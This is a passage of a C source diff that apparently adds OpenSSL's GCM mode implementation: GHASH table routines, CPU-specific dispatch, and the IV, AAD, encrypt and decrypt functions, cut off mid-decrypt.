+            Z.lo ^= Htable[nlo].lo;
+        }
+#   else
+    /*
+     * Extra 256+16 bytes per-key plus 512 bytes shared tables
+     * [should] give ~50% improvement... One could have PACK()-ed
+     * the rem_8bit even here, but the priority is to minimize
+     * cache footprint...
+     */
+    u128 Hshr4[16];             /* Htable shifted right by 4 bits */
+    u8 Hshl4[16];               /* Htable shifted left by 4 bits */
+    static const unsigned short rem_8bit[256] = {
+        0x0000, 0x01C2, 0x0384, 0x0246, 0x0708, 0x06CA, 0x048C, 0x054E,
+        0x0E10, 0x0FD2, 0x0D94, 0x0C56, 0x0918, 0x08DA, 0x0A9C, 0x0B5E,
+        0x1C20, 0x1DE2, 0x1FA4, 0x1E66, 0x1B28, 0x1AEA, 0x18AC, 0x196E,
+        0x1230, 0x13F2, 0x11B4, 0x1076, 0x1538, 0x14FA, 0x16BC, 0x177E,
+        0x3840, 0x3982, 0x3BC4, 0x3A06, 0x3F48, 0x3E8A, 0x3CCC, 0x3D0E,
+        0x3650, 0x3792, 0x35D4, 0x3416, 0x3158, 0x309A, 0x32DC, 0x331E,
+        0x2460, 0x25A2, 0x27E4, 0x2626, 0x2368, 0x22AA, 0x20EC, 0x212E,
+        0x2A70, 0x2BB2, 0x29F4, 0x2836, 0x2D78, 0x2CBA, 0x2EFC, 0x2F3E,
+        0x7080, 0x7142, 0x7304, 0x72C6, 0x7788, 0x764A, 0x740C, 0x75CE,
+        0x7E90, 0x7F52, 0x7D14, 0x7CD6, 0x7998, 0x785A, 0x7A1C, 0x7BDE,
+        0x6CA0, 0x6D62, 0x6F24, 0x6EE6, 0x6BA8, 0x6A6A, 0x682C, 0x69EE,
+        0x62B0, 0x6372, 0x6134, 0x60F6, 0x65B8, 0x647A, 0x663C, 0x67FE,
+        0x48C0, 0x4902, 0x4B44, 0x4A86, 0x4FC8, 0x4E0A, 0x4C4C, 0x4D8E,
+        0x46D0, 0x4712, 0x4554, 0x4496, 0x41D8, 0x401A, 0x425C, 0x439E,
+        0x54E0, 0x5522, 0x5764, 0x56A6, 0x53E8, 0x522A, 0x506C, 0x51AE,
+        0x5AF0, 0x5B32, 0x5974, 0x58B6, 0x5DF8, 0x5C3A, 0x5E7C, 0x5FBE,
+        0xE100, 0xE0C2, 0xE284, 0xE346, 0xE608, 0xE7CA, 0xE58C, 0xE44E,
+        0xEF10, 0xEED2, 0xEC94, 0xED56, 0xE818, 0xE9DA, 0xEB9C, 0xEA5E,
+        0xFD20, 0xFCE2, 0xFEA4, 0xFF66, 0xFA28, 0xFBEA, 0xF9AC, 0xF86E,
+        0xF330, 0xF2F2, 0xF0B4, 0xF176, 0xF438, 0xF5FA, 0xF7BC, 0xF67E,
+        0xD940, 0xD882, 0xDAC4, 0xDB06, 0xDE48, 0xDF8A, 0xDDCC, 0xDC0E,
+        0xD750, 0xD692, 0xD4D4, 0xD516, 0xD058, 0xD19A, 0xD3DC, 0xD21E,
+        0xC560, 0xC4A2, 0xC6E4, 0xC726, 0xC268, 0xC3AA, 0xC1EC, 0xC02E,
+        0xCB70, 0xCAB2, 0xC8F4, 0xC936, 0xCC78, 0xCDBA, 0xCFFC, 0xCE3E,
+        0x9180, 0x9042, 0x9204, 0x93C6, 0x9688, 0x974A, 0x950C, 0x94CE,
+        0x9F90, 0x9E52, 0x9C14, 0x9DD6, 0x9898, 0x995A, 0x9B1C, 0x9ADE,
+        0x8DA0, 0x8C62, 0x8E24, 0x8FE6, 0x8AA8, 0x8B6A, 0x892C, 0x88EE,
+        0x83B0, 0x8272, 0x8034, 0x81F6, 0x84B8, 0x857A, 0x873C, 0x86FE,
+        0xA9C0, 0xA802, 0xAA44, 0xAB86, 0xAEC8, 0xAF0A, 0xAD4C, 0xAC8E,
+        0xA7D0, 0xA612, 0xA454, 0xA596, 0xA0D8, 0xA11A, 0xA35C, 0xA29E,
+        0xB5E0, 0xB422, 0xB664, 0xB7A6, 0xB2E8, 0xB32A, 0xB16C, 0xB0AE,
+        0xBBF0, 0xBA32, 0xB874, 0xB9B6, 0xBCF8, 0xBD3A, 0xBF7C, 0xBEBE
+    };
+    /*
+     * This pre-processing phase slows down procedure by approximately
+     * same time as it makes each loop spin faster. In other words
+     * single block performance is approximately same as straightforward
+     * "4-bit" implementation, and then it goes only faster...
+     */
+    for (cnt = 0; cnt < 16; ++cnt) {
+        Z.hi = Htable[cnt].hi;
+        Z.lo = Htable[cnt].lo;
+        Hshr4[cnt].lo = (Z.hi << 60) | (Z.lo >> 4);
+        Hshr4[cnt].hi = (Z.hi >> 4);
+        Hshl4[cnt] = (u8)(Z.lo << 4);
+    }
+
+    do {
+        for (Z.lo = 0, Z.hi = 0, cnt = 15; cnt; --cnt) {
+            nlo = ((const u8 *)Xi)[cnt];
+            nlo ^= inp[cnt];
+            nhi = nlo >> 4;
+            nlo &= 0xf;
+
+            Z.hi ^= Htable[nlo].hi;
+            Z.lo ^= Htable[nlo].lo;
+
+            rem = (size_t)Z.lo & 0xff;
+
+            Z.lo = (Z.hi << 56) | (Z.lo >> 8);
+            Z.hi = (Z.hi >> 8);
+
+            Z.hi ^= Hshr4[nhi].hi;
+            Z.lo ^= Hshr4[nhi].lo;
+            Z.hi ^= (u64)rem_8bit[rem ^ Hshl4[nhi]] << 48;
+        }
+
+        nlo = ((const u8 *)Xi)[0];
+        nlo ^= inp[0];
+        nhi = nlo >> 4;
+        nlo &= 0xf;
+
+        Z.hi ^= Htable[nlo].hi;
+        Z.lo ^= Htable[nlo].lo;
+
+        rem = (size_t)Z.lo & 0xf;
+
+        Z.lo = (Z.hi << 60) | (Z.lo >> 4);
+        Z.hi = (Z.hi >> 4);
+
+        Z.hi ^= Htable[nhi].hi;
+        Z.lo ^= Htable[nhi].lo;
+        Z.hi ^= ((u64)rem_8bit[rem << 4]) << 48;
+#   endif
+
+        if (is_endian.little) {
+#   ifdef BSWAP8
+            Xi[0] = BSWAP8(Z.hi);
+            Xi[1] = BSWAP8(Z.lo);
+#   else
+            u8 *p = (u8 *)Xi;
+            u32 v;
+            v = (u32)(Z.hi >> 32);
+            PUTU32(p, v);
+            v = (u32)(Z.hi);
+            PUTU32(p + 4, v);
+            v = (u32)(Z.lo >> 32);
+            PUTU32(p + 8, v);
+            v = (u32)(Z.lo);
+            PUTU32(p + 12, v);
+#   endif
+        } else {
+            Xi[0] = Z.hi;
+            Xi[1] = Z.lo;
+        }
+    } while (inp += 16, len -= 16);
+}
+#  endif
+# else
+void gcm_gmult_4bit(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_4bit(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                    size_t len);
+# endif
+
+# define GCM_MUL(ctx,Xi)   gcm_gmult_4bit(ctx->Xi.u,ctx->Htable)
+# if defined(GHASH_ASM) || !defined(OPENSSL_SMALL_FOOTPRINT)
+#  define GHASH(ctx,in,len) gcm_ghash_4bit((ctx)->Xi.u,(ctx)->Htable,in,len)
+/*
+ * GHASH_CHUNK is "stride parameter" missioned to mitigate cache trashing
+ * effect. In other words idea is to hash data while it's still in L1 cache
+ * after encryption pass...
+ */
+#  define GHASH_CHUNK       (3*1024)
+# endif
+
+#else                           /* TABLE_BITS */
+
+static void gcm_gmult_1bit(u64 Xi[2], const u64 H[2])
+{
+    u128 V, Z = { 0, 0 };
+    long X;
+    int i, j;
+    const long *xi = (const long *)Xi;
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    V.hi = H[0];                /* H is in host byte order, no byte swapping */
+    V.lo = H[1];
+
+    for (j = 0; j < 16 / sizeof(long); ++j) {
+        if (is_endian.little) {
+            if (sizeof(long) == 8) {
+# ifdef BSWAP8
+                X = (long)(BSWAP8(xi[j]));
+# else
+                const u8 *p = (const u8 *)(xi + j);
+                X = (long)((u64)GETU32(p) << 32 | GETU32(p + 4));
+# endif
+            } else {
+                const u8 *p = (const u8 *)(xi + j);
+                X = (long)GETU32(p);
+            }
+        } else
+            X = xi[j];
+
+        for (i = 0; i < 8 * sizeof(long); ++i, X <<= 1) {
+            u64 M = (u64)(X >> (8 * sizeof(long) - 1));
+            Z.hi ^= V.hi & M;
+            Z.lo ^= V.lo & M;
+
+            REDUCE1BIT(V);
+        }
+    }
+
+    if (is_endian.little) {
+# ifdef BSWAP8
+        Xi[0] = BSWAP8(Z.hi);
+        Xi[1] = BSWAP8(Z.lo);
+# else
+        u8 *p = (u8 *)Xi;
+        u32 v;
+        v = (u32)(Z.hi >> 32);
+        PUTU32(p, v);
+        v = (u32)(Z.hi);
+        PUTU32(p + 4, v);
+        v = (u32)(Z.lo >> 32);
+        PUTU32(p + 8, v);
+        v = (u32)(Z.lo);
+        PUTU32(p + 12, v);
+# endif
+    } else {
+        Xi[0] = Z.hi;
+        Xi[1] = Z.lo;
+    }
+}
+
+# define GCM_MUL(ctx,Xi)   gcm_gmult_1bit(ctx->Xi.u,ctx->H.u)
+
+#endif
+
+#if     TABLE_BITS==4 && (defined(GHASH_ASM) || defined(OPENSSL_CPUID_OBJ))
+# if    !defined(I386_ONLY) && \
+        (defined(__i386)        || defined(__i386__)    || \
+         defined(__x86_64)      || defined(__x86_64__)  || \
+         defined(_M_IX86)       || defined(_M_AMD64)    || defined(_M_X64))
+#  define GHASH_ASM_X86_OR_64
+#  define GCM_FUNCREF_4BIT
+extern unsigned int OPENSSL_ia32cap_P[2];
+
+void gcm_init_clmul(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_clmul(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_clmul(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                     size_t len);
+
+#  if defined(__i386) || defined(__i386__) || defined(_M_IX86)
+#   define gcm_init_avx   gcm_init_clmul
+#   define gcm_gmult_avx  gcm_gmult_clmul
+#   define gcm_ghash_avx  gcm_ghash_clmul
+#  else
+void gcm_init_avx(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_avx(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_avx(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                   size_t len);
+#  endif
+
+#  if   defined(__i386) || defined(__i386__) || defined(_M_IX86)
+#   define GHASH_ASM_X86
+void gcm_gmult_4bit_mmx(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_4bit_mmx(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                        size_t len);
+
+void gcm_gmult_4bit_x86(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_4bit_x86(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                        size_t len);
+#  endif
+# elif defined(__arm__) || defined(__arm) || defined(__aarch64__)
+#  include "arm_arch.h"
+#  if __ARM_MAX_ARCH__>=7
+#   define GHASH_ASM_ARM
+#   define GCM_FUNCREF_4BIT
+#   define PMULL_CAPABLE        (OPENSSL_armcap_P & ARMV8_PMULL)
+#   if defined(__arm__) || defined(__arm)
+#    define NEON_CAPABLE        (OPENSSL_armcap_P & ARMV7_NEON)
+#   endif
+void gcm_init_neon(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_neon(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_neon(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                    size_t len);
+void gcm_init_v8(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_v8(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_v8(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                  size_t len);
+#  endif
+# elif defined(__sparc__) || defined(__sparc)
+#  include "sparc_arch.h"
+#  define GHASH_ASM_SPARC
+#  define GCM_FUNCREF_4BIT
+extern unsigned int OPENSSL_sparcv9cap_P[];
+void gcm_init_vis3(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_vis3(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_vis3(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                    size_t len);
+# elif defined(OPENSSL_CPUID_OBJ) && (defined(__powerpc__) || defined(__ppc__) || defined(_ARCH_PPC))
+#  include "ppc_arch.h"
+#  define GHASH_ASM_PPC
+#  define GCM_FUNCREF_4BIT
+void gcm_init_p8(u128 Htable[16], const u64 Xi[2]);
+void gcm_gmult_p8(u64 Xi[2], const u128 Htable[16]);
+void gcm_ghash_p8(u64 Xi[2], const u128 Htable[16], const u8 *inp,
+                  size_t len);
+# endif
+#endif
+
+#ifdef GCM_FUNCREF_4BIT
+# undef  GCM_MUL
+# define GCM_MUL(ctx,Xi)        (*gcm_gmult_p)(ctx->Xi.u,ctx->Htable)
+# ifdef GHASH
+#  undef  GHASH
+#  define GHASH(ctx,in,len)     (*gcm_ghash_p)(ctx->Xi.u,ctx->Htable,in,len)
+# endif
+#endif
+
+void CRYPTO_gcm128_init(GCM128_CONTEXT *ctx, void *key, block128_f block)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+
+    memset(ctx, 0, sizeof(*ctx));
+    ctx->block = block;
+    ctx->key = key;
+
+    (*block) (ctx->H.c, ctx->H.c, key);
+
+    if (is_endian.little) {
+        /* H is stored in host byte order */
+#ifdef BSWAP8
+        ctx->H.u[0] = BSWAP8(ctx->H.u[0]);
+        ctx->H.u[1] = BSWAP8(ctx->H.u[1]);
+#else
+        u8 *p = ctx->H.c;
+        u64 hi, lo;
+        hi = (u64)GETU32(p) << 32 | GETU32(p + 4);
+        lo = (u64)GETU32(p + 8) << 32 | GETU32(p + 12);
+        ctx->H.u[0] = hi;
+        ctx->H.u[1] = lo;
+#endif
+    }
+#if     TABLE_BITS==8
+    gcm_init_8bit(ctx->Htable, ctx->H.u);
+#elif   TABLE_BITS==4
+# if    defined(GHASH_ASM_X86_OR_64)
+#  if   !defined(GHASH_ASM_X86) || defined(OPENSSL_IA32_SSE2)
+    if (OPENSSL_ia32cap_P[0] & (1 << 24) && /* check FXSR bit */
+        OPENSSL_ia32cap_P[1] & (1 << 1)) { /* check PCLMULQDQ bit */
+        if (((OPENSSL_ia32cap_P[1] >> 22) & 0x41) == 0x41) { /* AVX+MOVBE */
+            gcm_init_avx(ctx->Htable, ctx->H.u);
+            ctx->gmult = gcm_gmult_avx;
+            ctx->ghash = gcm_ghash_avx;
+        } else {
+            gcm_init_clmul(ctx->Htable, ctx->H.u);
+            ctx->gmult = gcm_gmult_clmul;
+            ctx->ghash = gcm_ghash_clmul;
+        }
+        return;
+    }
+#  endif
+    gcm_init_4bit(ctx->Htable, ctx->H.u);
+#  if   defined(GHASH_ASM_X86)  /* x86 only */
+#   if  defined(OPENSSL_IA32_SSE2)
+    if (OPENSSL_ia32cap_P[0] & (1 << 25)) { /* check SSE bit */
+#   else
+    if (OPENSSL_ia32cap_P[0] & (1 << 23)) { /* check MMX bit */
+#   endif
+        ctx->gmult = gcm_gmult_4bit_mmx;
+        ctx->ghash = gcm_ghash_4bit_mmx;
+    } else {
+        ctx->gmult = gcm_gmult_4bit_x86;
+        ctx->ghash = gcm_ghash_4bit_x86;
+    }
+#  else
+    ctx->gmult = gcm_gmult_4bit;
+    ctx->ghash = gcm_ghash_4bit;
+#  endif
+# elif  defined(GHASH_ASM_ARM)
+#  ifdef PMULL_CAPABLE
+    if (PMULL_CAPABLE) {
+        gcm_init_v8(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_v8;
+        ctx->ghash = gcm_ghash_v8;
+    } else
+#  endif
+#  ifdef NEON_CAPABLE
+    if (NEON_CAPABLE) {
+        gcm_init_neon(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_neon;
+        ctx->ghash = gcm_ghash_neon;
+    } else
+#  endif
+    {
+        gcm_init_4bit(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_4bit;
+        ctx->ghash = gcm_ghash_4bit;
+    }
+# elif  defined(GHASH_ASM_SPARC)
+    if (OPENSSL_sparcv9cap_P[0] & SPARCV9_VIS3) {
+        gcm_init_vis3(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_vis3;
+        ctx->ghash = gcm_ghash_vis3;
+    } else {
+        gcm_init_4bit(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_4bit;
+        ctx->ghash = gcm_ghash_4bit;
+    }
+# elif  defined(GHASH_ASM_PPC)
+    if (OPENSSL_ppccap_P & PPC_CRYPTO207) {
+        gcm_init_p8(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_p8;
+        ctx->ghash = gcm_ghash_p8;
+    } else {
+        gcm_init_4bit(ctx->Htable, ctx->H.u);
+        ctx->gmult = gcm_gmult_4bit;
+        ctx->ghash = gcm_ghash_4bit;
+    }
+# else
+    gcm_init_4bit(ctx->Htable, ctx->H.u);
+# endif
+#endif
+}
+
+void CRYPTO_gcm128_setiv(GCM128_CONTEXT *ctx, const unsigned char *iv,
+                         size_t len)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    unsigned int ctr;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+#endif
+
+    ctx->Yi.u[0] = 0;
+    ctx->Yi.u[1] = 0;
+    ctx->Xi.u[0] = 0;
+    ctx->Xi.u[1] = 0;
+    ctx->len.u[0] = 0;          /* AAD length */
+    ctx->len.u[1] = 0;          /* message length */
+    ctx->ares = 0;
+    ctx->mres = 0;
+
+    if (len == 12) {
+        memcpy(ctx->Yi.c, iv, 12);
+        ctx->Yi.c[15] = 1;
+        ctr = 1;
+    } else {
+        size_t i;
+        u64 len0 = len;
+
+        while (len >= 16) {
+            for (i = 0; i < 16; ++i)
+                ctx->Yi.c[i] ^= iv[i];
+            GCM_MUL(ctx, Yi);
+            iv += 16;
+            len -= 16;
+        }
+        if (len) {
+            for (i = 0; i < len; ++i)
+                ctx->Yi.c[i] ^= iv[i];
+            GCM_MUL(ctx, Yi);
+        }
+        len0 <<= 3;
+        if (is_endian.little) {
+#ifdef BSWAP8
+            ctx->Yi.u[1] ^= BSWAP8(len0);
+#else
+            ctx->Yi.c[8] ^= (u8)(len0 >> 56);
+            ctx->Yi.c[9] ^= (u8)(len0 >> 48);
+            ctx->Yi.c[10] ^= (u8)(len0 >> 40);
+            ctx->Yi.c[11] ^= (u8)(len0 >> 32);
+            ctx->Yi.c[12] ^= (u8)(len0 >> 24);
+            ctx->Yi.c[13] ^= (u8)(len0 >> 16);
+            ctx->Yi.c[14] ^= (u8)(len0 >> 8);
+            ctx->Yi.c[15] ^= (u8)(len0);
+#endif
+        } else
+            ctx->Yi.u[1] ^= len0;
+
+        GCM_MUL(ctx, Yi);
+
+        if (is_endian.little)
+#ifdef BSWAP4
+            ctr = BSWAP4(ctx->Yi.d[3]);
+#else
+            ctr = GETU32(ctx->Yi.c + 12);
+#endif
+        else
+            ctr = ctx->Yi.d[3];
+    }
+
+    (*ctx->block) (ctx->Yi.c, ctx->EK0.c, ctx->key);
+    ++ctr;
+    if (is_endian.little)
+#ifdef BSWAP4
+        ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+        PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+    else
+        ctx->Yi.d[3] = ctr;
+}
+
+int CRYPTO_gcm128_aad(GCM128_CONTEXT *ctx, const unsigned char *aad,
+                      size_t len)
+{
+    size_t i;
+    unsigned int n;
+    u64 alen = ctx->len.u[0];
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+# ifdef GHASH
+    void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                         const u8 *inp, size_t len) = ctx->ghash;
+# endif
+#endif
+
+    if (ctx->len.u[1])
+        return -2;
+
+    alen += len;
+    if (alen > (U64(1) << 61) || (sizeof(len) == 8 && alen < len))
+        return -1;
+    ctx->len.u[0] = alen;
+
+    n = ctx->ares;
+    if (n) {
+        while (n && len) {
+            ctx->Xi.c[n] ^= *(aad++);
+            --len;
+            n = (n + 1) % 16;
+        }
+        if (n == 0)
+            GCM_MUL(ctx, Xi);
+        else {
+            ctx->ares = n;
+            return 0;
+        }
+    }
+#ifdef GHASH
+    if ((i = (len & (size_t)-16))) {
+        GHASH(ctx, aad, i);
+        aad += i;
+        len -= i;
+    }
+#else
+    while (len >= 16) {
+        for (i = 0; i < 16; ++i)
+            ctx->Xi.c[i] ^= aad[i];
+        GCM_MUL(ctx, Xi);
+        aad += 16;
+        len -= 16;
+    }
+#endif
+    if (len) {
+        n = (unsigned int)len;
+        for (i = 0; i < len; ++i)
+            ctx->Xi.c[i] ^= aad[i];
+    }
+
+    ctx->ares = n;
+    return 0;
+}
+
+int CRYPTO_gcm128_encrypt(GCM128_CONTEXT *ctx,
+                          const unsigned char *in, unsigned char *out,
+                          size_t len)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    unsigned int n, ctr;
+    size_t i;
+    u64 mlen = ctx->len.u[1];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+# ifdef GHASH
+    void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                         const u8 *inp, size_t len) = ctx->ghash;
+# endif
+#endif
+
+#if 0
+    n = (unsigned int)mlen % 16; /* alternative to ctx->mres */
+#endif
+    mlen += len;
+    if (mlen > ((U64(1) << 36) - 32) || (sizeof(len) == 8 && mlen < len))
+        return -1;
+    ctx->len.u[1] = mlen;
+
+    if (ctx->ares) {
+        /* First call to encrypt finalizes GHASH(AAD) */
+        GCM_MUL(ctx, Xi);
+        ctx->ares = 0;
+    }
+
+    if (is_endian.little)
+#ifdef BSWAP4
+        ctr = BSWAP4(ctx->Yi.d[3]);
+#else
+        ctr = GETU32(ctx->Yi.c + 12);
+#endif
+    else
+        ctr = ctx->Yi.d[3];
+
+    n = ctx->mres;
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (16 % sizeof(size_t) == 0) { /* always true actually */
+        do {
+            if (n) {
+                while (n && len) {
+                    ctx->Xi.c[n] ^= *(out++) = *(in++) ^ ctx->EKi.c[n];
+                    --len;
+                    n = (n + 1) % 16;
+                }
+                if (n == 0)
+                    GCM_MUL(ctx, Xi);
+                else {
+                    ctx->mres = n;
+                    return 0;
+                }
+            }
+# if defined(STRICT_ALIGNMENT)
+            if (((size_t)in | (size_t)out) % sizeof(size_t) != 0)
+                break;
+# endif
+# if defined(GHASH) && defined(GHASH_CHUNK)
+            while (len >= GHASH_CHUNK) {
+                size_t j = GHASH_CHUNK;
+
+                while (j) {
+                    size_t *out_t = (size_t *)out;
+                    const size_t *in_t = (const size_t *)in;
+
+                    (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                    ++ctr;
+                    if (is_endian.little)
+#  ifdef BSWAP4
+                        ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                        PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                    else
+                        ctx->Yi.d[3] = ctr;
+                    for (i = 0; i < 16 / sizeof(size_t); ++i)
+                        out_t[i] = in_t[i] ^ ctx->EKi.t[i];
+                    out += 16;
+                    in += 16;
+                    j -= 16;
+                }
+                GHASH(ctx, out - GHASH_CHUNK, GHASH_CHUNK);
+                len -= GHASH_CHUNK;
+            }
+            if ((i = (len & (size_t)-16))) {
+                size_t j = i;
+
+                while (len >= 16) {
+                    size_t *out_t = (size_t *)out;
+                    const size_t *in_t = (const size_t *)in;
+
+                    (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                    ++ctr;
+                    if (is_endian.little)
+#  ifdef BSWAP4
+                        ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                        PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                    else
+                        ctx->Yi.d[3] = ctr;
+                    for (i = 0; i < 16 / sizeof(size_t); ++i)
+                        out_t[i] = in_t[i] ^ ctx->EKi.t[i];
+                    out += 16;
+                    in += 16;
+                    len -= 16;
+                }
+                GHASH(ctx, out - j, j);
+            }
+# else
+            while (len >= 16) {
+                size_t *out_t = (size_t *)out;
+                const size_t *in_t = (const size_t *)in;
+
+                (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                ++ctr;
+                if (is_endian.little)
+#  ifdef BSWAP4
+                    ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                    PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                else
+                    ctx->Yi.d[3] = ctr;
+                for (i = 0; i < 16 / sizeof(size_t); ++i)
+                    ctx->Xi.t[i] ^= out_t[i] = in_t[i] ^ ctx->EKi.t[i];
+                GCM_MUL(ctx, Xi);
+                out += 16;
+                in += 16;
+                len -= 16;
+            }
+# endif
+            if (len) {
+                (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                ++ctr;
+                if (is_endian.little)
+# ifdef BSWAP4
+                    ctx->Yi.d[3] = BSWAP4(ctr);
+# else
+                    PUTU32(ctx->Yi.c + 12, ctr);
+# endif
+                else
+                    ctx->Yi.d[3] = ctr;
+                while (len--) {
+                    ctx->Xi.c[n] ^= out[n] = in[n] ^ ctx->EKi.c[n];
+                    ++n;
+                }
+            }
+
+            ctx->mres = n;
+            return 0;
+        } while (0);
+    }
+#endif
+    for (i = 0; i < len; ++i) {
+        if (n == 0) {
+            (*block) (ctx->Yi.c, ctx->EKi.c, key);
+            ++ctr;
+            if (is_endian.little)
+#ifdef BSWAP4
+                ctx->Yi.d[3] = BSWAP4(ctr);
+#else
+                PUTU32(ctx->Yi.c + 12, ctr);
+#endif
+            else
+                ctx->Yi.d[3] = ctr;
+        }
+        ctx->Xi.c[n] ^= out[i] = in[i] ^ ctx->EKi.c[n];
+        n = (n + 1) % 16;
+        if (n == 0)
+            GCM_MUL(ctx, Xi);
+    }
+
+    ctx->mres = n;
+    return 0;
+}
+
+int CRYPTO_gcm128_decrypt(GCM128_CONTEXT *ctx,
+                          const unsigned char *in, unsigned char *out,
+                          size_t len)
+{
+    const union {
+        long one;
+        char little;
+    } is_endian = {
+        1
+    };
+    unsigned int n, ctr;
+    size_t i;
+    u64 mlen = ctx->len.u[1];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+#ifdef GCM_FUNCREF_4BIT
+    void (*gcm_gmult_p) (u64 Xi[2], const u128 Htable[16]) = ctx->gmult;
+# ifdef GHASH
+    void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                         const u8 *inp, size_t len) = ctx->ghash;
+# endif
+#endif
+
+    mlen += len;
+    if (mlen > ((U64(1) << 36) - 32) || (sizeof(len) == 8 && mlen < len))
+        return -1;
+    ctx->len.u[1] = mlen;
+
+    if (ctx->ares) {
+        /* First call to decrypt finalizes GHASH(AAD) */
+        GCM_MUL(ctx, Xi);
+        ctx->ares = 0;
+    }
+
+    if (is_endian.little)
+#ifdef BSWAP4
+        ctr = BSWAP4(ctx->Yi.d[3]);
+#else
+        ctr = GETU32(ctx->Yi.c + 12);
+#endif
+    else
+        ctr = ctx->Yi.d[3];
+
+    n = ctx->mres;
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (16 % sizeof(size_t) == 0) { /* always true actually */
+        do {
+            if (n) {
+                while (n && len) {
+                    u8 c = *(in++);
+                    *(out++) = c ^ ctx->EKi.c[n];
+                    ctx->Xi.c[n] ^= c;
+                    --len;
+                    n = (n + 1) % 16;
+                }
+                if (n == 0)
+                    GCM_MUL(ctx, Xi);
+                else {
+                    ctx->mres = n;
+                    return 0;
+                }
+            }
+# if defined(STRICT_ALIGNMENT)
+            if (((size_t)in | (size_t)out) % sizeof(size_t) != 0)
+                break;
+# endif
+# if defined(GHASH) && defined(GHASH_CHUNK)
+            while (len >= GHASH_CHUNK) {
+                size_t j = GHASH_CHUNK;
+
+                GHASH(ctx, in, GHASH_CHUNK);
+                while (j) {
+                    size_t *out_t = (size_t *)out;
+                    const size_t *in_t = (const size_t *)in;
+
+                    (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                    ++ctr;
+                    if (is_endian.little)
+#  ifdef BSWAP4
+                        ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                        PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                    else
+                        ctx->Yi.d[3] = ctr;
+                    for (i = 0; i < 16 / sizeof(size_t); ++i)
+                        out_t[i] = in_t[i] ^ ctx->EKi.t[i];
+                    out += 16;
+                    in += 16;
+                    j -= 16;
+                }
+                len -= GHASH_CHUNK;
+            }
+            if ((i = (len & (size_t)-16))) {
+                GHASH(ctx, in, i);
+                while (len >= 16) {
+                    size_t *out_t = (size_t *)out;
+                    const size_t *in_t = (const size_t *)in;
+
+                    (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                    ++ctr;
+                    if (is_endian.little)
+#  ifdef BSWAP4
+                        ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                        PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                    else
+                        ctx->Yi.d[3] = ctr;
+                    for (i = 0; i < 16 / sizeof(size_t); ++i)
+                        out_t[i] = in_t[i] ^ ctx->EKi.t[i];
+                    out += 16;
+                    in += 16;
+                    len -= 16;
+                }
+            }
+# else
+            while (len >= 16) {
+                size_t *out_t = (size_t *)out;
+                const size_t *in_t = (const size_t *)in;
+
+                (*block) (ctx->Yi.c, ctx->EKi.c, key);
+                ++ctr;
+                if (is_endian.little)
+#  ifdef BSWAP4
+                    ctx->Yi.d[3] = BSWAP4(ctr);
+#  else
+                    PUTU32(ctx->Yi.c + 12, ctr);
+#  endif
+                else
+                    ctx->Yi.d[3] = ctr;
+                for (i = 0; i < 16 / sizeof(size_t); ++i) {
+                    size_t c = in[i];
